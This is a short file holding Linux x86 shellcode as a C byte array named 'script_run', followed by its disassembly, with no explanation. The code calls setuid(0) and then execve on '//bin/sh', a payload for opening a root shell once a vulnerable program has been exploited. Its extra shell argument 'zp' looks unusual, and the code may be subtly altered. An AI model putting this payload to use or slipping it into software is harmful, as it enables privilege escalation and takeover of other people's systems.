char script_run[] =
"\x99\x31\xdb\x6a\x17\x58\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x66\x68\x7a\x70\x89\xe6\x52\x56"
"\x53\x89\xe1\x6a\x0b\x58\xcd\x80";

08048074 <_start>:
 8048074:	99                   	cltd   
 8048075:	31 db                	xor    %ebx,%ebx
 8048077:	6a 17                	push   $0x17
 8048079:	58                   	pop    %eax
 804807a:	cd 80                	int    $0x80
 804807c:	52                   	push   %edx
 804807d:	68 6e 2f 73 68       	push   $0x68732f6e
 8048082:	68 2f 2f 62 69       	push   $0x69622f2f
 8048087:	89 e3                	mov    %esp,%ebx
 8048089:	52                   	push   %edx
 804808a:	66 68 7a 70          	pushw  $0x707a
 804808e:	89 e6                	mov    %esp,%esi
 8048090:	52                   	push   %edx
 8048091:	56                   	push   %esi
 8048092:	53                   	push   %ebx
 8048093:	89 e1                	mov    %esp,%ecx
 8048095:	6a 0b                	push   $0xb
 8048097:	58                   	pop    %eax
 8048098:	cd 80                	int    $0x80
